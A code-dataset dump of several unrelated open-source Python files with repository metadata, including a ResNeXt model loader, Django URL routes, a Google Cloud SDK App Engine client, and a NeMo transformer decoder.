model = resnext_car_multitask(resnext_model=model_dir, class_num=class_num, test=test, **kwargs)
params = torch.load(model_dir)
keys = params.keys()
keys1 = list(keys)
if not test:
print('load imagent model')
params.pop(keys1[-1])
params.pop(keys1[-2])
new_state_dict = OrderedDict()
for k,v in params.items():
name = 'resnext_car_multitask.'+k
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
print('load test model')
new_state_dict = OrderedDict()
for k,v in params.items():
name = k[7:]
print(name)
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
model = resnext_car_multitask(resnext_model=None, class_num=class_num, test=test, **kwargs)
return model
| [
"[email protected]"
]
| |
94d03e9f0f7b8cec3c47cc368593566e2ada6fad | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_magnesia.py | 9193757fb3463cb627d30a16deadeb1b54c32ebb | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py |
#calss header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
34b0a3903fbab558986e74b115ebb5bf14cae7a3 | 7c857119fe1505b1d80d6e62969661c06dc1a2f4 | /BaseTools/Source/Python/GenFds/VerSection.py | 7280e80cb4ef7ce47524af2de67a3c2e84cf5a33 | [
"BSD-2-Clause"
]
| permissive | CloverHackyColor/CloverBootloader | 7042ca7dd6b513d22be591a295e49071ae1482ee | 2711170df4f60b2ae5aa20add3e00f35cf57b7e5 | refs/heads/master | 2023-08-30T22:14:34.590134 | 2023-08-27T19:14:02 | 2023-08-27T19:14:02 | 205,810,121 | 4,734 | 770 | BSD-2-Clause | 2023-09-03T12:41:33 | 2019-09-02T08:22:14 | C | UTF-8 | Python | false | false | 2,917 | py | ## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
## The constructor
#
# @param self The object pointer
#
def __init__(self):
VerSectionClassObject.__init__(self)
## GenSection() method
#
# Generate version section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
#
# Prepare the parameter of GenSection
#
if FfsInf:
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
self.StringData = FfsInf.__ExtendMacro__(self.StringData)
self.FileName = FfsInf.__ExtendMacro__(self.FileName)
OutputFile = os.path.join(OutputPath,
ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
OutputFile = os.path.normpath(OutputFile)
# Get String Data
StringData = ''
if self.StringData:
StringData = self.StringData
elif self.FileName:
if Dict is None:
Dict = {}
FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
FileObj = open(FileNameStr, 'r')
StringData = FileObj.read()
StringData = '"' + StringData + '"'
FileObj.close()
GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
| [
"[email protected]"
]
| |
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18 | db1247a3999e3f22db025639d09a605082ded89d | /grid/urls.py | 4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a | [
"MIT"
]
| permissive | wise-team/hiveprojects.io | 1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0 | 96e15a53f02c7327fe982a06b2dce56cd130e38c | refs/heads/master | 2022-12-12T18:44:35.221892 | 2020-03-27T21:50:03 | 2020-03-27T21:50:03 | 248,597,914 | 5 | 1 | MIT | 2022-11-22T01:59:55 | 2020-03-19T20:24:59 | Python | UTF-8 | Python | false | false | 2,093 | py | """grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
urlpatterns = [
url(
regex='^add/$',
view=add_grid,
name='add_grid',
),
url(
regex='^(?P<slug>[-\w]+)/edit/$',
view=edit_grid,
name='edit_grid',
),
url(
regex='^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$',
view=edit_element,
name='edit_element',
),
url(
regex='^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$',
view=add_feature,
name='add_feature',
),
url(
regex='^feature/(?P<id>\d+)/$',
view=edit_feature,
name='edit_feature',
),
url(
regex='^feature/(?P<id>\d+)/delete/$',
view=delete_feature,
name='delete_feature',
),
url(
regex='^package/(?P<id>\d+)/delete/$',
view=delete_grid_package,
name='delete_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$',
view=add_grid_package,
name='add_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$',
view=add_new_grid_package,
name='add_new_grid_package',
),
url(
regex='^ajax_grid_list/$',
view=ajax_grid_list,
name='ajax_grid_list',
),
url(
regex='^$',
view=grids,
name='grids',
),
url(
regex='^g/(?P<slug>[-\w]+)/$',
view=grid_detail,
name='grid',
),
url(
regex='^g/(?P<slug>[-\w]+)/landscape/$',
view=views.grid_detail_landscape,
name='grid_landscape',
),
url(regex='^g/(?P<slug>[-\w]+)/timesheet/$',
view=views.grid_timesheet,
name='grid_timesheet'
)
]
| [
"[email protected]"
]
| |
c5ad1b5d232b6458e70b9d7459d2978fcf989724 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/PatternRefactoring/trashvisitor/Visitor.py | 29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4 | []
| no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 215 | py | # PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
class Visitor:
def visit(self, Aluminum a)
def visit(self, Paper p)
def visit(self, Glass g)
def visit(self, Cardboard c)
| [
"[email protected]"
]
| |
d8efecb43d9198e3dd2221f4e39fb241646378fc | 0032d988541e85c47b5034c20ecf88220dde5a95 | /openbook_posts/migrations/0026_auto_20190414_1620.py | 242d6b7b2f6ad2429773288abeaee56f0fb9ccf8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | OkunaOrg/okuna-api | eabd37fef9d2be59b590ed8d72bee084ac377997 | f87d8e80d2f182c01dbce68155ded0078ee707e4 | refs/heads/master | 2022-02-04T21:31:10.577601 | 2021-12-28T18:20:39 | 2021-12-28T18:20:39 | 151,052,951 | 185 | 92 | MIT | 2022-01-13T01:00:40 | 2018-10-01T07:44:46 | Python | UTF-8 | Python | false | false | 444 | py | # Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0025_post_is_edited'),
]
operations = [
migrations.AlterField(
model_name='post',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
),
]
| [
"[email protected]"
]
| |
b613607484ff4991e3b7a52462661a1989ffd82b | 9b41bd4d829b7b4b5fc7ea2f375089793f34beb0 | /lib/googlecloudsdk/api_lib/app/appengine_client.py | baa0ff95581004e5a3dbd6f42446a6baadea863d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | eyalev/gcloud | 20a596f9cbf7873eaea652a0b2ad080678f1598c | 421ee63a0a6d90a097e8530d53a6df5b905a0205 | refs/heads/master | 2020-12-25T14:48:11.142544 | 2016-06-22T08:43:20 | 2016-06-22T08:43:20 | 61,703,392 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,561 | py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module used by gcloud to communicate with appengine services."""
from __future__ import with_statement
import urllib2
from googlecloudsdk.api_lib.app import logs_requestor
from googlecloudsdk.api_lib.app import util
from googlecloudsdk.api_lib.app import yaml_parsing
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.credentials import devshell as c_devshell
from googlecloudsdk.core.credentials import http
from googlecloudsdk.core.credentials import service_account as c_service_account
from googlecloudsdk.core.credentials import store as c_store
from googlecloudsdk.third_party.appengine.datastore import datastore_index
from googlecloudsdk.third_party.appengine.tools import appengine_rpc_httplib2
from oauth2client.contrib import gce as oauth2client_gce
import yaml
APPCFG_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
# Parameters for reading from the GCE metadata service.
METADATA_BASE = 'http://metadata.google.internal'
SERVICE_ACCOUNT_BASE = ('computeMetadata/v1/instance/service-accounts/default')
RpcServerClass = appengine_rpc_httplib2.HttpRpcServerOAuth2 # pylint: disable=invalid-name
class Error(exceptions.Error):
"""Base exception for the module."""
pass
class UnknownConfigType(Error):
"""An exception for when trying to update a config type we don't know."""
pass
class AppengineClient(object):
"""Client used by gcloud to communicate with appengine services.
Attributes:
server: The appengine server to which requests are sent.
project: The appengine application in use.
oauth2_access_token: An existing OAuth2 access token to use.
oauth2_refresh_token: An existing OAuth2 refresh token to use.
authenticate_service_account: Authenticate using the default service account
for the Google Compute Engine VM in which gcloud is being called.
ignore_bad_certs: Whether to ignore certificate errors when talking to the
server.
"""
def __init__(self, server=None, ignore_bad_certs=False):
self.server = server or 'appengine.google.com'
self.project = properties.VALUES.core.project.Get(required=True)
self.ignore_bad_certs = ignore_bad_certs
# Auth related options
self.oauth2_access_token = None
self.oauth2_refresh_token = None
self.oauth_scopes = APPCFG_SCOPES
self.authenticate_service_account = False
self.client_id = None
self.client_secret = None
account = properties.VALUES.core.account.Get()
# This statement will raise a c_store.Error if there is a problem
# fetching credentials.
credentials = c_store.Load(account=account)
if isinstance(credentials, c_service_account.ServiceAccountCredentials):
self.oauth2_access_token = credentials.access_token
self.client_id = credentials.client_id
self.client_secret = credentials.client_secret
elif isinstance(credentials, c_devshell.DevshellCredentials):
# TODO(user): This passes the access token to use for API calls to
# appcfg which means that commands that are longer than the lifetime
# of the access token may fail - e.g. some long deployments. The proper
# solution is to integrate appcfg closer with the Cloud SDK libraries,
# this code will go away then and the standard credentials flow will be
# used.
self.oauth2_access_token = credentials.access_token
self.client_id = None
self.client_secret = None
elif isinstance(credentials, oauth2client_gce.AppAssertionCredentials):
# If we are on GCE, use the service account
self.authenticate_service_account = True
self.client_id = None
self.client_secret = None
else:
# Otherwise use a stored refresh token
self.oauth2_refresh_token = credentials.refresh_token
self.client_id = credentials.client_id
self.client_secret = credentials.client_secret
def CleanupIndexes(self, index_yaml):
"""Removes unused datastore indexes.
Args:
index_yaml: The parsed yaml file with index data.
"""
rpcserver = self._GetRpcServer()
response = rpcserver.Send('/api/datastore/index/diff',
app_id=self.project, payload=index_yaml.ToYAML())
unused_new_indexes, notused_indexes = (
datastore_index.ParseMultipleIndexDefinitions(response))
# Get confirmation from user which indexes should be deleted.
deletions = datastore_index.IndexDefinitions(indexes=[])
if notused_indexes.indexes:
for index in notused_indexes.indexes:
msg = ('This index is no longer defined in your index.yaml file.\n{0}'
.format(str(index.ToYAML())))
prompt = 'Do you want to delete this index'
if console_io.PromptContinue(msg, prompt, default=True):
deletions.indexes.append(index)
# Do deletions of confirmed indexes.
if deletions.indexes:
response = rpcserver.Send('/api/datastore/index/delete',
app_id=self.project, payload=deletions.ToYAML())
not_deleted = datastore_index.ParseIndexDefinitions(response)
# Notify the user when indexes are not deleted.
if not_deleted.indexes:
not_deleted_count = len(not_deleted.indexes)
if not_deleted_count == 1:
warning_message = ('An index was not deleted. Most likely this is '
'because it no longer exists.\n\n')
else:
warning_message = ('%d indexes were not deleted. Most likely this '
'is because they no longer exist.\n\n'
% not_deleted_count)
for index in not_deleted.indexes:
warning_message += index.ToYAML()
log.warning(warning_message)
def GetLogs(self, service, version, severity, vhost, include_vhost,
include_all, num_days, end_date, output_file):
"""Get application logs for the given version of the service.
Args:
service: str, The service of the app to fetch logs from.
version: str, The version of the app to fetch logs for.
severity: int, App log severity to request (0-4); None for request logs
only.
vhost: str, The virtual host of log messages to get. None for all hosts.
include_vhost: bool, If true, the virtual host is included in log
messages.
include_all: bool, If true, we add to the log message everything we know
about the request.
num_days: int, Number of days worth of logs to export; 0 for all
available.
end_date: datetime.date, Date object representing last day of logs to
return. If None, today is used.
output_file: Output file name or '-' for standard output.
"""
rpcserver = self._GetRpcServer()
requestor = logs_requestor.LogsRequester(
rpcserver, self.project, service, version, severity, vhost,
include_vhost, include_all)
requestor.DownloadLogs(num_days, end_date, output_file)
def GetLogsAppend(self, service, version, severity, vhost, include_vhost,
include_all, end_date, output_file):
"""Get application logs and append them to an existing file.
Args:
service: str, The service of the app to fetch logs from.
version: str, The version of the app to fetch logs for.
severity: int, App log severity to request (0-4); None for request logs
only.
vhost: str, The virtual host of log messages to get. None for all hosts.
include_vhost: bool, If true, the virtual host is included in log
messages.
include_all: bool, If true, we add to the log message everything we know
about the request.
end_date: datetime.date, Date object representing last day of logs to
return. If None, today is used.
output_file: Output file name or '-' for standard output.
"""
rpcserver = self._GetRpcServer()
requestor = logs_requestor.LogsRequester(
rpcserver, self.project, service, version, severity, vhost,
include_vhost, include_all)
requestor.DownloadLogsAppend(end_date, output_file)
def PrepareVmRuntime(self):
"""Prepare the application for vm runtimes and return state."""
rpcserver = self._GetRpcServer(timeout_max_errors=5)
rpcserver.Send('/api/vms/prepare', app_id=self.project)
# TODO(b/29059251): vm_name and instance id are different, this API client
# needs the VM name. The Zeus API will use instance id instead.
def SetManagedByGoogle(self, service, version, vm_name=None, wait=True):
"""Sets a service version (and optionally an instance) to Google managed.
This will reboot the machine and restore the instance with a fresh runtime.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
wait: bool, True to wait until it takes effect.
"""
self._SetManagedBy(service, version, vm_name, '/api/vms/lock', wait)
def SetManagedBySelf(self, service, version, vm_name=None, wait=True):
"""Sets a service version (optionally a single instance) as self managed.
This is the 'break the glass' mode that lets you ssh into the machine and
debug.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
wait: bool, True to wait until it takes effect.
"""
self._SetManagedBy(service, version, vm_name, '/api/vms/debug', wait)
def _SetManagedBy(self, service, version, vm_name, url, wait):
"""Switches a service version between management modes.
Args:
service: str, The service to update.
version: str, The version of the service to update.
vm_name: str, The vm name of the instance to update.
url: str, The URL of the API to call to make the update.
wait: bool, True to wait until it takes effect.
Raises:
Error: if changing the instance debug state failed.
"""
rpcserver = self._GetRpcServer()
kwargs = {'app_id': self.project,
'version_match': version,
'module': service}
if vm_name:
kwargs['instance'] = vm_name
rpcserver.Send(url, **kwargs)
if wait:
def GetState():
yaml_data = rpcserver.Send(
'/api/vms/debugstate', app_id=self.project, version_match=version,
module=service)
state = yaml.safe_load(yaml_data)
done = state['state'] != 'PENDING'
return (done, (state['state'], state['message']))
def PrintRetryMessage((unused_state, msg), delay):
log.status.Print('{0}. Will try again in {1} seconds.'
.format(msg, delay))
_, (state, message) = util.RetryWithBackoff(
GetState, PrintRetryMessage, initial_delay=1, backoff_factor=2,
max_delay=5, max_tries=20)
if state == 'ERROR':
raise Error(message)
def StartService(self, service, version):
"""Starts serving a the given version of the service.
This only works if scaling is set to manual.
Args:
service: str, The service to start.
version: str, The version of the service to start.
"""
self._GetRpcServer().Send('/api/modules/start', app_id=self.project,
module=service, version=version)
def StopService(self, service, version):
"""Stop serving a the given version of the service.
This only works if scaling is set to manual.
Args:
service: str, The service to stop.
version: str, The version of the service to stop.
"""
self._GetRpcServer().Send('/api/modules/stop', app_id=self.project,
module=service, version=version)
def UpdateConfig(self, config_name, parsed_yaml):
"""Updates any of the supported config file types.
Args:
config_name: str, The name of the config to deploy.
parsed_yaml: The parsed object corresponding to that config type.
Raises:
UnknownConfigType: If config_name is not a value config type.
Returns:
Whatever the underlying update methods return.
"""
if config_name == yaml_parsing.ConfigYamlInfo.CRON:
return self.UpdateCron(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.DISPATCH:
return self.UpdateDispatch(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.DOS:
return self.UpdateDos(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.INDEX:
return self.UpdateIndexes(parsed_yaml)
if config_name == yaml_parsing.ConfigYamlInfo.QUEUE:
return self.UpdateQueues(parsed_yaml)
raise UnknownConfigType(
'Config type [{0}] is not a known config type'.format(config_name))
def UpdateCron(self, cron_yaml):
"""Updates any new or changed cron definitions.
Args:
cron_yaml: The parsed yaml file with cron data.
"""
self._GetRpcServer().Send('/api/cron/update',
app_id=self.project, payload=cron_yaml.ToYAML())
def UpdateDispatch(self, dispatch_yaml):
"""Updates new or changed dispatch definitions.
Args:
dispatch_yaml: The parsed yaml file with dispatch data.
"""
self._GetRpcServer().Send('/api/dispatch/update',
app_id=self.project,
payload=dispatch_yaml.ToYAML())
def UpdateDos(self, dos_yaml):
"""Updates any new or changed dos definitions.
Args:
dos_yaml: The parsed yaml file with dos data.
"""
self._GetRpcServer().Send('/api/dos/update',
app_id=self.project, payload=dos_yaml.ToYAML())
def UpdateIndexes(self, index_yaml):
"""Updates indexes.
Args:
index_yaml: The parsed yaml file with index data.
"""
self._GetRpcServer().Send('/api/datastore/index/add',
app_id=self.project, payload=index_yaml.ToYAML())
def UpdateQueues(self, queue_yaml):
"""Updates any new or changed task queue definitions.
Args:
queue_yaml: The parsed yaml file with queue data.
"""
self._GetRpcServer().Send('/api/queue/update',
app_id=self.project, payload=queue_yaml.ToYAML())
def _GetRpcServer(self, timeout_max_errors=2):
"""Returns an instance of an AbstractRpcServer.
Args:
timeout_max_errors: How many timeout errors to retry.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
log.debug('Host: {0}'.format(self.server))
if self._IsGceEnvironment():
credentials = oauth2client_gce.AppAssertionCredentials()
else:
credentials = None
# In this case, the get_user_credentials parameters to the RPC server
# constructor is actually an OAuth2Parameters.
get_user_credentials = (
appengine_rpc_httplib2.HttpRpcServerOAuth2.OAuth2Parameters(
access_token=self.oauth2_access_token,
client_id=self.client_id,
client_secret=self.client_secret,
scope=APPCFG_SCOPES,
refresh_token=self.oauth2_refresh_token,
credential_file=None,
token_uri=None,
credentials=credentials))
# Also set gflags flag... this is a bit of a hack.
if hasattr(appengine_rpc_httplib2.tools, 'FLAGS'):
appengine_rpc_httplib2.tools.FLAGS.auth_local_webserver = True
server = RpcServerClass(
self.server,
get_user_credentials,
util.GetUserAgent(),
util.GetSourceName(),
host_override=None,
save_cookies=True,
auth_tries=3,
timeout_max_errors=timeout_max_errors,
account_type='HOSTED_OR_GOOGLE',
secure=True,
ignore_certs=self.ignore_bad_certs,
http_object=http.Http())
# TODO(user) Hack to avoid failure due to missing cacerts.txt resource.
server.certpath = None
# Don't use a cert file if the user passed ignore-bad-certs.
server.cert_file_available = not self.ignore_bad_certs
return util.RPCServer(server)
def _IsGceEnvironment(self):
"""Determine if we are running in a GCE environment.
Returns:
True if we are running in a GCE environment.
Raises:
Error: The user has requested authentication for a service account but the
environment is not correct for that to work.
"""
if self.authenticate_service_account:
# Avoid hard-to-understand errors later by checking that we have a
# metadata service (so we are in a GCE VM) and that the VM is configured
# with access to the appengine.admin scope.
url = '%s/%s/scopes' % (METADATA_BASE, SERVICE_ACCOUNT_BASE)
try:
req = urllib2.Request(url, headers={'Metadata-Flavor': 'Google'})
vm_scopes_string = urllib2.urlopen(req).read()
except urllib2.URLError, e:
raise Error(
'Could not obtain scope list from metadata service: %s: %s. This '
'may be because we are not running in a Google Compute Engine VM.' %
(url, e))
vm_scopes = vm_scopes_string.split()
missing = list(set(self.oauth_scopes).difference(vm_scopes))
if missing:
raise Error(
'You are currently logged into gcloud using a service account '
'which does not have the appropriate access to [{0}]. The account '
'has the following scopes: [{1}]. It needs [{2}] in order to '
'succeed.\nPlease recreate this VM instance with the missing '
'scopes. You may also log into a standard account that has the '
'appropriate access by using `gcloud auth login`.'
.format(self.project, ', '.join(vm_scopes), ', '.join(missing)))
return True
else:
return False
| [
"[email protected]"
]
| |
a9194341e115335348649466389655b10bc7ccd4 | caa05194b8f11f29a19767c94fdc93628be694d5 | /nemo/collections/nlp/modules/common/transformer/transformer_decoders.py | 910a7104ea24d2870a596d91e46359933d887e99 | [
"Apache-2.0"
]
| permissive | Jimmy-INL/NeMo | a589ab0ab97b9ccb8921579670e80c470ce7077b | 6a3753b3013dc92a3587853d60c5086e2e64d98f | refs/heads/main | 2023-04-02T22:28:29.891050 | 2021-04-13T18:22:24 | 2021-04-13T18:22:24 | 357,681,603 | 1 | 0 | Apache-2.0 | 2021-04-13T20:34:12 | 2021-04-13T20:34:12 | null | UTF-8 | Python | false | false | 8,169 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
"""
Building block of Transformer decoder.
Args:
hidden_size: size of the embeddings in the model, also known as d_model
inner_size: number of neurons in the intermediate part of feed-forward
net, usually is (4-8 x hidden_size) in the papers
num_attention_heads: number of heads in multi-head attention
attn_score_dropout: probability of dropout applied to attention scores
attn_layer_dropout: probability of dropout applied to the output of the
attention layers, but before layer normalization
ffn_dropout: probability of dropout applied to FFN output
hidden_act: activation function used between two linear layers in FFN
"""
def __init__(
self,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
self.pre_ln = pre_ln
self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
self.first_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
self.second_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)
def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Pre-LayerNorm block
Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
"""
residual = decoder_query
decoder_query = self.layer_norm_1(decoder_query)
decoder_keys = self.layer_norm_1(decoder_keys)
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += residual
residual = self_attn_output
self_attn_output = self.layer_norm_2(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += residual
residual = enc_dec_attn_output
enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += residual
return output_states
def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Post-LayerNorm block
Order of operations: Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
"""
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += decoder_query
self_attn_output = self.layer_norm_1(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += self_attn_output
enc_dec_attn_output = self.layer_norm_2(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += enc_dec_attn_output
return self.layer_norm_3(output_states)
def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
if self.pre_ln:
return self.forward_preln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
else:
return self.forward_postln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
def __init__(
self,
num_layers: int,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
layer = TransformerDecoderBlock(
hidden_size,
inner_size,
num_attention_heads,
attn_score_dropout,
attn_layer_dropout,
ffn_dropout,
hidden_act,
pre_ln,
)
self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
self.diagonal = 0
def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
if decoder_mems_list is not None:
memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
else:
memory_states = decoder_states
return memory_states
def forward(
self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
):
"""
Args:
decoder_states: output of the embedding layer (B x L_dec x H)
decoder_mask: decoder inputs mask (B x L_dec)
encoder_states: output of the encoder (B x L_enc x H)
encoder_mask: encoder inputs mask (B x L_enc)
decoder_mems_list: list of the cached decoder hidden states
for fast autoregressive generation which will be used instead
of decoder_states as keys and values if not None
return_mems: bool, whether to return outputs of all decoder layers
or the last layer only
"""
decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
encoder_attn_mask = form_attention_mask(encoder_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
cached_mems_list = [memory_states]
for i, layer in enumerate(self.layers):
decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
cached_mems_list.append(memory_states)
if return_mems:
return cached_mems_list
else:
return cached_mems_list[-1]
def eval(self):
self.diagonal = None
super().eval()
def train(self, mode=True):
if mode is True:
self.diagonal = 0
else:
self.diagonal = None
super().train(mode)
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
sample = next(self.parameters())
input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
| [
"[email protected]"
]
| |
08541c40fee9474b87a66113054f486ea71f0e98 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-network/azure/mgmt/network/models/network_interface.py | fa19b8e2ad03dfa74bef269fdcb7d724b08d0661 | [
"MIT"
]
| permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 4,531 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
